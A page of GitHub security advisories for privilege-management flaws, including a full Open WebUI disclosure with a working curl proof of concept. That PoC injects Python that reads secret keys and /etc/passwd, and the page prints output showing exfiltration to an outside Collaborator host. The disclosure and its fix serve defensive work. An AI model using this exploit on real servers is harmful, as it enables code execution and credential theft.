CWE-269
DiscouragedImproper Privilege Management
Abstraction: Class · Status: Draft
The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor.
5439 vulnerabilities reference this CWE, most recent first.
GHSA-P3PJ-XF59-54R5
Vulnerability from github – Published: 2026-04-20 18:31 – Updated: 2026-04-20 18:31Dell PowerProtect Data Domain appliances, versions 7.7.1.0 through 8.7.0.0, LTS2025 release versions 8.3.1.0 through 8.3.1.20, LTS2024 release versions 7.13.1.0 through 7.13.1.60 contain an improper privilege management vulnerability in IDRAC. A high privileged attacker with local access could potentially exploit this vulnerability, leading to elevation of privileges to access unauthorized delete operation in IDRAC.
{
"affected": [],
"aliases": [
"CVE-2026-35154"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-20T17:16:34Z",
"severity": "MODERATE"
},
"details": "Dell PowerProtect Data Domain appliances, versions 7.7.1.0 through 8.7.0.0, LTS2025 release versions 8.3.1.0 through 8.3.1.20, LTS2024 release versions 7.13.1.0 through 7.13.1.60 contain an improper privilege management vulnerability in IDRAC. A high privileged attacker with local access could potentially exploit this vulnerability, leading to elevation of privileges to access unauthorized delete operation in IDRAC.",
"id": "GHSA-p3pj-xf59-54r5",
"modified": "2026-04-20T18:31:49Z",
"published": "2026-04-20T18:31:49Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35154"
},
{
"type": "WEB",
"url": "https://www.dell.com/support/kbdoc/en-us/000450699/dsa-2026-060-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-P3Q3-Q7X8-QCF4
Vulnerability from github – Published: 2022-05-13 01:49 – Updated: 2022-05-13 01:49An issue was discovered in Joomla! Core before 3.8.8. Inadequate checks allowed users to modify the access levels of user groups with higher permissions.
{
"affected": [],
"aliases": [
"CVE-2018-11323"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-05-22T15:29:00Z",
"severity": "HIGH"
},
"details": "An issue was discovered in Joomla! Core before 3.8.8. Inadequate checks allowed users to modify the access levels of user groups with higher permissions.",
"id": "GHSA-p3q3-q7x8-qcf4",
"modified": "2022-05-13T01:49:12Z",
"published": "2022-05-13T01:49:12Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11323"
},
{
"type": "WEB",
"url": "https://developer.joomla.org/security-centre/729-20180501-core-acl-violation-in-access-levels.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/104276"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1040966"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-P3RM-M944-QXGV
Vulnerability from github – Published: 2022-05-24 19:20 – Updated: 2023-12-28 18:30Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability
{
"affected": [],
"aliases": [
"CVE-2021-42277"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-11-10T01:19:00Z",
"severity": "HIGH"
},
"details": "Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability",
"id": "GHSA-p3rm-m944-qxgv",
"modified": "2023-12-28T18:30:31Z",
"published": "2022-05-24T19:20:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42277"
},
{
"type": "WEB",
"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42277"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-21-1306"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-P43Q-WJV5-RF63
Vulnerability from github – Published: 2022-05-24 17:06 – Updated: 2022-05-24 17:06Insecure permissions in cwrapper_perl in Centreon Infrastructure Monitoring Software through 19.10 allow local attackers to gain privileges. (cwrapper_perl is a setuid executable allowing execution of Perl scripts with root privileges.)
{
"affected": [],
"aliases": [
"CVE-2019-20327"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-01-16T15:15:00Z",
"severity": "HIGH"
},
"details": "Insecure permissions in cwrapper_perl in Centreon Infrastructure Monitoring Software through 19.10 allow local attackers to gain privileges. (cwrapper_perl is a setuid executable allowing execution of Perl scripts with root privileges.)",
"id": "GHSA-p43q-wjv5-rf63",
"modified": "2022-05-24T17:06:49Z",
"published": "2022-05-24T17:06:49Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-20327"
},
{
"type": "WEB",
"url": "https://gist.github.com/Diefunction/9237f46b8659a65ab08de8ec9c258139"
},
{
"type": "WEB",
"url": "https://www.centreon.com/en"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-P49C-25RW-2MWC
Vulnerability from github – Published: 2022-03-10 00:00 – Updated: 2022-03-17 00:02Windows Print Spooler Elevation of Privilege Vulnerability.
{
"affected": [],
"aliases": [
"CVE-2022-23284"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-03-09T17:15:00Z",
"severity": "HIGH"
},
"details": "Windows Print Spooler Elevation of Privilege Vulnerability.",
"id": "GHSA-p49c-25rw-2mwc",
"modified": "2022-03-17T00:02:32Z",
"published": "2022-03-10T00:00:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23284"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23284"
},
{
"type": "WEB",
"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-23284"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-P4FV-C2P2-RFJH
Vulnerability from github – Published: 2021-12-28 00:00 – Updated: 2022-07-13 00:01Privilege escalation vulnerability in the Self-Defense driver of Avast Antivirus prior to 20.8 allows a local user with SYSTEM privileges to gain elevated privileges by "hollowing" process wsc_proxy.exe which could lead to acquire antimalware (AM-PPL) protection.
{
"affected": [],
"aliases": [
"CVE-2021-45337"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-12-27T14:15:00Z",
"severity": "HIGH"
},
"details": "Privilege escalation vulnerability in the Self-Defense driver of Avast Antivirus prior to 20.8 allows a local user with SYSTEM privileges to gain elevated privileges by \"hollowing\" process wsc_proxy.exe which could lead to acquire antimalware (AM-PPL) protection.",
"id": "GHSA-p4fv-c2p2-rfjh",
"modified": "2022-07-13T00:01:50Z",
"published": "2021-12-28T00:00:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45337"
},
{
"type": "WEB",
"url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST3%20%26%20CVE-2021-AVST4%20%26%20CVE-2021-AVST5"
},
{
"type": "WEB",
"url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-P4FX-23FQ-JFG6
Vulnerability from github – Published: 2026-05-14 20:26 – Updated: 2026-05-15 23:55Summary
The tool update endpoint (POST /api/v1/tools/id/{id}/update) is missing the workspace.tools permission check that is present on the tool create endpoint. This allows a user who has been explicitly denied tool management capabilities ( and who the administrator considers untrusted for code execution ) to replace a tool's server-side Python content and trigger execution, bypassing the intended workspace.tools security boundary.
Open WebUI's security policy correctly states that workspace.tools is the trust boundary for code execution: "Granting a user the ability to create Tools is equivalent to giving them shell access to the server." This vulnerability breaks that boundary. A write access grant on a single tool is sufficient to bypass workspace.tools entirely.
This is not a report about exec() being unsandboxed (that is acknowledged as intended behavior). This is a report about a missing authorization check that allows an untrusted user to reach the exec() sink that should be gated behind workspace.tools.
Root Cause
The create and update endpoints for tools have asymmetric authorization checks. The create endpoint enforces the workspace.tools permission; the update endpoint does not.
Create endpoint, enforces workspace.tools
File: backend/open_webui/routers/tools.py, lines 326-345
@router.post('/create', response_model=Optional[ToolResponse])
async def create_new_tools(
request: Request,
form_data: ToolForm,
user=Depends(get_verified_user),
db: AsyncSession = Depends(get_async_session),
):
if user.role != 'admin' and not (
await has_permission(
user.id, 'workspace.tools', # ← CHECKED
request.app.state.config.USER_PERMISSIONS, db=db
)
or await has_permission(
user.id, 'workspace.tools_import', # ← CHECKED
request.app.state.config.USER_PERMISSIONS, db=db
)
):
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail=ERROR_MESSAGES.UNAUTHORIZED,
)
# ... proceeds to exec(content, ...) at line 367
Update endpoint does NOT enforce workspace.tools
File: backend/open_webui/routers/tools.py, lines 451-485
@router.post('/id/{id}/update', response_model=Optional[ToolModel])
async def update_tools_by_id(
request: Request,
id: str,
form_data: ToolForm,
user=Depends(get_verified_user),
db: AsyncSession = Depends(get_async_session),
):
tools = await Tools.get_tool_by_id(id, db=db)
# ...
if (
tools.user_id != user.id
and not await AccessGrants.has_access(
user_id=user.id,
resource_type='tool',
resource_id=tools.id,
permission='write', # ← only checks write grant
db=db,
)
and user.role != 'admin'
):
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail=ERROR_MESSAGES.UNAUTHORIZED,
)
# NOTE: No has_permission(user.id, 'workspace.tools', ...) check
# ... proceeds to exec(content, ...) at line 485
tool_module, frontmatter = await load_tool_module_by_id(id, content=form_data.content)
The write access grant is a collaboration primitive used across the application (knowledge bases, prompts, models, tools) for content editing. On every other resource type, a write grant allows editing metadata and content. On tools specifically, because the update endpoint triggers exec(), a write grant silently escalates to code execution but only because the workspace.tools check is missing. If the check were present (as it is on create), the write grant would not confer execution privilege.
Prerequisites
- Attacker (Bob): A regular user account with no
workspace.toolspermission.workspace.toolsis disabled by default (config.py:1364-1366), so this is the default state for all non-admin users. - Collaborator (Alice): A user with
workspace.toolspermission who creates a tool and grantswriteaccess to Bob. This is a normal collaboration workflow Alice is sharing editing access, not granting code execution rights. - No admin action required beyond the initial
workspace.toolsgrant to Alice (which is the intended, documented workflow).
Note on default configuration: The workspace.tools permission defaults to false. An administrator must explicitly enable it for at least one user (Alice). This is a documented, recommended workflow the security policy explicitly describes granting workspace.tools to trusted users. The vulnerability is not that Alice has this permission; it is that Bob can bypass it.
Proof of Concept
Environment
docker run -d -p 3000:8080 --name open-webui ghcr.io/open-webui/open-webui:main
Default configuration. Admin creates an account, enables workspace.tools for trusted users via Admin Panel > Settings > User Permissions.
Step-by-step reproduction
Step 1 Setup users
Create two non-admin users: Alice (trusted, will get workspace.tools) and Bob (untrusted, will NOT get workspace.tools).
ADMIN_TOKEN="<admin-jwt>"
BASE="http://localhost:3000"
# Create Alice
ALICE=$(curl -s -X POST "$BASE/api/v1/auths/add" \
-H "Authorization: Bearer $ADMIN_TOKEN" \
-H "Content-Type: application/json" \
-d '{"name":"alice","email":"alice@test.com","password":"alice123","role":"user"}')
ALICE_TOKEN=$(echo $ALICE | jq -r .token)
ALICE_ID=$(echo $ALICE | jq -r .id)
# Create Bob
BOB=$(curl -s -X POST "$BASE/api/v1/auths/add" \
-H "Authorization: Bearer $ADMIN_TOKEN" \
-H "Content-Type: application/json" \
-d '{"name":"bob","email":"bob@test.com","password":"bob12345","role":"user"}')
BOB_TOKEN=$(echo $BOB | jq -r .token)
BOB_ID=$(echo $BOB | jq -r .id)
Step 2 Admin enables workspace.tools globally
This is the documented workflow for allowing trusted users to build tools.
# Get current permissions
PERMS=$(curl -s "$BASE/api/v1/users/default/permissions" \
-H "Authorization: Bearer $ADMIN_TOKEN")
# Enable workspace.tools
PERMS=$(echo $PERMS | jq '.workspace.tools = true')
curl -s -X POST "$BASE/api/v1/users/default/permissions" \
-H "Authorization: Bearer $ADMIN_TOKEN" \
-H "Content-Type: application/json" \
-d "$PERMS"
Step 3 Alice creates a benign tool
curl -s -X POST "$BASE/api/v1/tools/create" \
-H "Authorization: Bearer $ALICE_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"id": "helper_tool",
"name": "Helper Tool",
"content": "class Tools:\n def hello(self):\n return \"Hello\"\n",
"meta": {"description": "A benign helper", "manifest": {}}
}'
Step 4 Alice grants write access to Bob (collaboration)
Alice wants Bob to be able to edit the tool's description or parameters. This is a standard collaboration feature.
curl -s -X POST "$BASE/api/v1/tools/id/helper_tool/access/update" \
-H "Authorization: Bearer $ALICE_TOKEN" \
-H "Content-Type: application/json" \
-d "{\"access_grants\": [
{\"principal_type\": \"user\", \"principal_id\": \"$BOB_ID\", \"permission\": \"write\"}
]}"
Step 5 Admin disables workspace.tools
Admin revokes the global permission. Now neither Alice nor Bob (nor any non-admin) should be able to execute code via tools.
PERMS=$(echo $PERMS | jq '.workspace.tools = false')
curl -s -X POST "$BASE/api/v1/users/default/permissions" \
-H "Authorization: Bearer $ADMIN_TOKEN" \
-H "Content-Type: application/json" \
-d "$PERMS"
Step 6 Verify Bob CANNOT create tools
curl -s -X POST "$BASE/api/v1/tools/create" \
-H "Authorization: Bearer $BOB_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"id": "bob_test",
"name": "Test",
"content": "class Tools: pass",
"meta": {"description": "test", "manifest": {}}
}'
# Returns: HTTP 401 "401 Unauthorized"
# Bob correctly CANNOT create tools.
Step 7 Bob updates the tool content → code execution (the bypass)
Bob replaces the tool's Python content. The update endpoint does not check workspace.tools, only the write access grant. The new content is passed to exec().
curl -s -X POST "$BASE/api/v1/tools/id/helper_tool/update" \
-H "Authorization: Bearer $BOB_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"id": "helper_tool",
"name": "Helper Tool",
"content": "import os, sys, json, platform, asyncio\n\nproof = {\n \"poc\": \"workspace.tools bypass via write grant\",\n \"whoami\": os.popen(\"whoami\").read().strip(),\n \"hostname\": os.popen(\"hostname\").read().strip(),\n \"pid\": os.getpid(),\n \"secret_key\": os.environ.get(\"WEBUI_SECRET_KEY\", \"\")[:16] + \"...\",\n}\ntry:\n proof[\"etc_passwd\"] = open(\"/etc/passwd\").read()[:300]\nexcept: pass\n\ntry:\n from open_webui.models.tools import Tools as ToolsModel\n loop = asyncio.get_event_loop()\n loop.run_until_complete(\n ToolsModel.update_tool_by_id(\"helper_tool\", {\n \"meta\": {\"description\": json.dumps(proof), \"manifest\": {}}\n })\n )\nexcept: pass\n\nclass Tools:\n def __init__(self): pass\n",
"meta": {"description": "A benign helper", "manifest": {}}
}'
# Returns: HTTP 200 exec() ran. Bob achieved code execution.
Actual PoC Output
The following is a complete run of the automated PoC script:
Step 1: Creating user 'bob' with NO workspace.tools permission...
Created bob: c945be42-6fd7-465d-80c9-2d5a99eb6c2f
Bob's role: user (NO workspace.tools)
Step 2: Disabling workspace.tools globally...
workspace.tools = false (globally)
Step 2b: Verifying bob CANNOT create tools (no permission)...
POST /tools/create as bob: HTTP 401
Correctly denied: 401 Unauthorized
Step 3: Re-enabling workspace.tools for attacker, creating benign tool...
Tool 'poc_rce_2' created by attacker
Step 4: Attacker grants write access on poc_rce_2 to bob...
Grant response: HTTP 200
Bob now has write access on poc_rce_2
Step 5: Disabling workspace.tools globally again...
workspace.tools = false (globally)
Step 6: Bob updates tool content with malicious Python...
Bob has: write grant on poc_rce_2 ONLY
Bob lacks: workspace.tools permission
Endpoint: POST /api/v1/tools/id/poc_rce_2/update
HTTP Status: 200
Tool updated exec() ran with bob's request!
Step 7: Reading exfiltrated proof from DB...
PRIVILEGE ESCALATION CONFIRMED:
{
"poc": "Privilege Escalation: write-grant on tool -> RCE (no workspace.tools needed)",
"vuln": "tools.py:467-481 update endpoint has NO workspace.tools check",
"whoami": "root",
"hostname": "3ffa54b2792d",
"cwd": "/app/backend",
"python": "/usr/local/bin/python3",
"pid": 1,
"platform": "Linux-5.15.167.4-microsoft-standard-WSL2-x86_64-with-glibc2.36",
"secret_key": "9GDyak0KOfrakPTM...",
"etc_passwd_head": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/va"
}
Burp Collaborator Evidence
The container made an outbound HTTP POST to a Collaborator server, confirming code execution from within the container:
POST /poc2 HTTP/1.1
Accept-Encoding: identity
Content-Length: 720
Host: jvi4qe8yi4bu1x1wixnmktgp9gf73xrm.oastify.com
User-Agent: Python-urllib/3.11
Content-Type: application/json
Connection: close
{"poc": "Privilege Escalation: write-grant on tool -> RCE (no workspace.tools needed)",
"vuln": "tools.py:467-481 update endpoint has NO workspace.tools check",
"whoami": "root", "hostname": "3ffa54b2792d", "cwd": "/app/backend",
"python": "/usr/local/bin/python3", "pid": 1,
"platform": "Linux-5.15.167.4-microsoft-standard-WSL2-x86_64-with-glibc2.36",
"secret_key": "9GDyak0KOfrakPTM...",
"etc_passwd_head": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:..."}
Security Boundary Violated
Open WebUI's security policy defines workspace.tools as the trust boundary for code execution:
"Tool creation is controlled by the workspace.tools permission, which is disabled by default for non-admin users and should only be granted to fully trusted users who are equivalent to system administrators in terms of trust. Granting a user the ability to create Tools is equivalent to giving them shell access to the server."
This vulnerability breaks that boundary:
| Check | Create endpoint (line 333) | Update endpoint (line 467) |
|---|---|---|
user.role == 'admin' |
Yes | Yes |
has_permission('workspace.tools') |
Yes | No |
has_permission('workspace.tools_import') |
Yes | No |
AccessGrants.has_access('write') |
No | Yes |
tools.user_id == user.id |
No (new tool) | Yes |
The update endpoint substitutes AccessGrants.has_access('write') where has_permission('workspace.tools') should be. A write grant is a collaboration primitive for editing content; workspace.tools is the code execution trust boundary. These are different privilege levels, but the update endpoint conflates them.
Impact
An attacker with a regular user account and a write access grant on any single tool can:
- Execute arbitrary server-side code as root (PID 1 in the default Docker deployment)
- Read sensitive environment variables (
WEBUI_SECRET_KEY,OPENAI_API_KEY, etc.) - Read/write the application database (all users' chats, files, API keys)
- Read arbitrary files from the container filesystem
- Make outbound network requests to internal services
The attacker never needs workspace.tools permission. The administrator's explicit decision to deny this user code execution capability is bypassed.
Remediation
Recommended Fix
Add the workspace.tools permission check to the update endpoint, matching the create endpoint's authorization gate:
File: backend/open_webui/routers/tools.py, after line 481 (after the existing access check)
# Add workspace.tools check for content changes (code execution)
if form_data.content != tools.content:
if user.role != 'admin' and not (
await has_permission(
user.id, 'workspace.tools',
request.app.state.config.USER_PERMISSIONS, db=db
)
or await has_permission(
user.id, 'workspace.tools_import',
request.app.state.config.USER_PERMISSIONS, db=db
)
):
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail=ERROR_MESSAGES.UNAUTHORIZED,
)
This allows users with write grants to update tool metadata (name, description, valves) without workspace.tools, but requires the permission for content changes that trigger code execution.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "open-webui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.9.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45395"
],
"database_specific": {
"cwe_ids": [
"CWE-269",
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-14T20:26:09Z",
"nvd_published_at": "2026-05-15T21:16:37Z",
"severity": "HIGH"
},
"details": "### Summary\n\nThe tool update endpoint (`POST /api/v1/tools/id/{id}/update`) is missing the `workspace.tools` permission check that is present on the tool create endpoint. This allows a user who has been explicitly **denied** tool management capabilities ( and who the administrator considers **untrusted** for code execution ) to replace a tool\u0027s server-side Python content and trigger execution, bypassing the intended `workspace.tools` security boundary.\n\nOpen WebUI\u0027s security policy correctly states that `workspace.tools` is the trust boundary for code execution: *\"Granting a user the ability to create Tools is equivalent to giving them shell access to the server.\"* This vulnerability breaks that boundary. A `write` access grant on a single tool is sufficient to bypass `workspace.tools` entirely.\n\nThis is **not** a report about exec() being unsandboxed (that is acknowledged as intended behavior). This is a report about a **missing authorization check** that allows an untrusted user to reach the exec() sink that should be gated behind `workspace.tools`.\n\n### Root Cause\n\nThe create and update endpoints for tools have **asymmetric authorization checks**. The create endpoint enforces the `workspace.tools` permission; the update endpoint does not.\n\n#### Create endpoint, enforces `workspace.tools`\n\n**File**: `backend/open_webui/routers/tools.py`, lines 326-345\n\n```python\n@router.post(\u0027/create\u0027, response_model=Optional[ToolResponse])\nasync def create_new_tools(\n request: Request,\n form_data: ToolForm,\n user=Depends(get_verified_user),\n db: AsyncSession = Depends(get_async_session),\n):\n if user.role != \u0027admin\u0027 and not (\n await has_permission(\n user.id, \u0027workspace.tools\u0027, # \u2190 CHECKED\n request.app.state.config.USER_PERMISSIONS, db=db\n )\n or await has_permission(\n user.id, \u0027workspace.tools_import\u0027, # \u2190 CHECKED\n request.app.state.config.USER_PERMISSIONS, db=db\n )\n ):\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=ERROR_MESSAGES.UNAUTHORIZED,\n )\n # ... proceeds to exec(content, ...) at line 367\n```\n\n#### Update endpoint does NOT enforce `workspace.tools`\n\n**File**: `backend/open_webui/routers/tools.py`, lines 451-485\n\n```python\n@router.post(\u0027/id/{id}/update\u0027, response_model=Optional[ToolModel])\nasync def update_tools_by_id(\n request: Request,\n id: str,\n form_data: ToolForm,\n user=Depends(get_verified_user),\n db: AsyncSession = Depends(get_async_session),\n):\n tools = await Tools.get_tool_by_id(id, db=db)\n # ...\n\n if (\n tools.user_id != user.id\n and not await AccessGrants.has_access(\n user_id=user.id,\n resource_type=\u0027tool\u0027,\n resource_id=tools.id,\n permission=\u0027write\u0027, # \u2190 only checks write grant\n db=db,\n )\n and user.role != \u0027admin\u0027\n ):\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=ERROR_MESSAGES.UNAUTHORIZED,\n )\n # NOTE: No has_permission(user.id, \u0027workspace.tools\u0027, ...) check\n\n # ... proceeds to exec(content, ...) at line 485\n tool_module, frontmatter = await load_tool_module_by_id(id, content=form_data.content)\n```\n\nThe `write` access grant is a collaboration primitive used across the application (knowledge bases, prompts, models, tools) for content editing. On every other resource type, a `write` grant allows editing metadata and content. On tools specifically, because the update endpoint triggers `exec()`, a `write` grant silently escalates to code execution but **only because the `workspace.tools` check is missing**. If the check were present (as it is on create), the `write` grant would not confer execution privilege.\n\n### Prerequisites\n\n1. **Attacker (Bob)**: A regular user account with **no** `workspace.tools` permission. `workspace.tools` is disabled by default (`config.py:1364-1366`), so this is the **default state** for all non-admin users.\n2. **Collaborator (Alice)**: A user with `workspace.tools` permission who creates a tool and grants `write` access to Bob. This is a normal collaboration workflow Alice is sharing editing access, not granting code execution rights.\n3. No admin action required beyond the initial `workspace.tools` grant to Alice (which is the intended, documented workflow).\n\n**Note on default configuration**: The `workspace.tools` permission defaults to `false`. An administrator must explicitly enable it for at least one user (Alice). This is a **documented, recommended workflow** the security policy explicitly describes granting `workspace.tools` to trusted users. The vulnerability is not that Alice has this permission; it is that Bob can bypass it.\n\n## Proof of Concept\n\n### Environment\n\n```bash\ndocker run -d -p 3000:8080 --name open-webui ghcr.io/open-webui/open-webui:main\n```\n\nDefault configuration. Admin creates an account, enables `workspace.tools` for trusted users via Admin Panel \u003e Settings \u003e User Permissions.\n\n### Step-by-step reproduction\n\n**Step 1 Setup users**\n\nCreate two non-admin users: Alice (trusted, will get `workspace.tools`) and Bob (untrusted, will NOT get `workspace.tools`).\n\n```bash\nADMIN_TOKEN=\"\u003cadmin-jwt\u003e\"\nBASE=\"http://localhost:3000\"\n\n# Create Alice\nALICE=$(curl -s -X POST \"$BASE/api/v1/auths/add\" \\\n -H \"Authorization: Bearer $ADMIN_TOKEN\" \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"name\":\"alice\",\"email\":\"alice@test.com\",\"password\":\"alice123\",\"role\":\"user\"}\u0027)\nALICE_TOKEN=$(echo $ALICE | jq -r .token)\nALICE_ID=$(echo $ALICE | jq -r .id)\n\n# Create Bob\nBOB=$(curl -s -X POST \"$BASE/api/v1/auths/add\" \\\n -H \"Authorization: Bearer $ADMIN_TOKEN\" \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"name\":\"bob\",\"email\":\"bob@test.com\",\"password\":\"bob12345\",\"role\":\"user\"}\u0027)\nBOB_TOKEN=$(echo $BOB | jq -r .token)\nBOB_ID=$(echo $BOB | jq -r .id)\n```\n\n**Step 2 Admin enables `workspace.tools` globally**\n\nThis is the documented workflow for allowing trusted users to build tools.\n\n```bash\n# Get current permissions\nPERMS=$(curl -s \"$BASE/api/v1/users/default/permissions\" \\\n -H \"Authorization: Bearer $ADMIN_TOKEN\")\n\n# Enable workspace.tools\nPERMS=$(echo $PERMS | jq \u0027.workspace.tools = true\u0027)\n\ncurl -s -X POST \"$BASE/api/v1/users/default/permissions\" \\\n -H \"Authorization: Bearer $ADMIN_TOKEN\" \\\n -H \"Content-Type: application/json\" \\\n -d \"$PERMS\"\n```\n\n**Step 3 Alice creates a benign tool**\n\n```bash\ncurl -s -X POST \"$BASE/api/v1/tools/create\" \\\n -H \"Authorization: Bearer $ALICE_TOKEN\" \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\n \"id\": \"helper_tool\",\n \"name\": \"Helper Tool\",\n \"content\": \"class Tools:\\n def hello(self):\\n return \\\"Hello\\\"\\n\",\n \"meta\": {\"description\": \"A benign helper\", \"manifest\": {}}\n }\u0027\n```\n\n**Step 4 Alice grants write access to Bob (collaboration)**\n\nAlice wants Bob to be able to edit the tool\u0027s description or parameters. This is a standard collaboration feature.\n\n```bash\ncurl -s -X POST \"$BASE/api/v1/tools/id/helper_tool/access/update\" \\\n -H \"Authorization: Bearer $ALICE_TOKEN\" \\\n -H \"Content-Type: application/json\" \\\n -d \"{\\\"access_grants\\\": [\n {\\\"principal_type\\\": \\\"user\\\", \\\"principal_id\\\": \\\"$BOB_ID\\\", \\\"permission\\\": \\\"write\\\"}\n ]}\"\n```\n\n**Step 5 Admin disables `workspace.tools`**\n\nAdmin revokes the global permission. Now neither Alice nor Bob (nor any non-admin) should be able to execute code via tools.\n\n```bash\nPERMS=$(echo $PERMS | jq \u0027.workspace.tools = false\u0027)\n\ncurl -s -X POST \"$BASE/api/v1/users/default/permissions\" \\\n -H \"Authorization: Bearer $ADMIN_TOKEN\" \\\n -H \"Content-Type: application/json\" \\\n -d \"$PERMS\"\n```\n\n**Step 6 Verify Bob CANNOT create tools**\n\n```bash\ncurl -s -X POST \"$BASE/api/v1/tools/create\" \\\n -H \"Authorization: Bearer $BOB_TOKEN\" \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\n \"id\": \"bob_test\",\n \"name\": \"Test\",\n \"content\": \"class Tools: pass\",\n \"meta\": {\"description\": \"test\", \"manifest\": {}}\n }\u0027\n# Returns: HTTP 401 \"401 Unauthorized\"\n# Bob correctly CANNOT create tools.\n```\n\n**Step 7 Bob updates the tool content \u2192 code execution (the bypass)**\n\nBob replaces the tool\u0027s Python content. The update endpoint does not check `workspace.tools`, only the `write` access grant. The new content is passed to `exec()`.\n\n```bash\ncurl -s -X POST \"$BASE/api/v1/tools/id/helper_tool/update\" \\\n -H \"Authorization: Bearer $BOB_TOKEN\" \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\n \"id\": \"helper_tool\",\n \"name\": \"Helper Tool\",\n \"content\": \"import os, sys, json, platform, asyncio\\n\\nproof = {\\n \\\"poc\\\": \\\"workspace.tools bypass via write grant\\\",\\n \\\"whoami\\\": os.popen(\\\"whoami\\\").read().strip(),\\n \\\"hostname\\\": os.popen(\\\"hostname\\\").read().strip(),\\n \\\"pid\\\": os.getpid(),\\n \\\"secret_key\\\": os.environ.get(\\\"WEBUI_SECRET_KEY\\\", \\\"\\\")[:16] + \\\"...\\\",\\n}\\ntry:\\n proof[\\\"etc_passwd\\\"] = open(\\\"/etc/passwd\\\").read()[:300]\\nexcept: pass\\n\\ntry:\\n from open_webui.models.tools import Tools as ToolsModel\\n loop = asyncio.get_event_loop()\\n loop.run_until_complete(\\n ToolsModel.update_tool_by_id(\\\"helper_tool\\\", {\\n \\\"meta\\\": {\\\"description\\\": json.dumps(proof), \\\"manifest\\\": {}}\\n })\\n )\\nexcept: pass\\n\\nclass Tools:\\n def __init__(self): pass\\n\",\n \"meta\": {\"description\": \"A benign helper\", \"manifest\": {}}\n }\u0027\n# Returns: HTTP 200 exec() ran. Bob achieved code execution.\n```\n\n### Actual PoC Output\n\nThe following is a complete run of the automated PoC script:\n\n```\nStep 1: Creating user \u0027bob\u0027 with NO workspace.tools permission...\n Created bob: 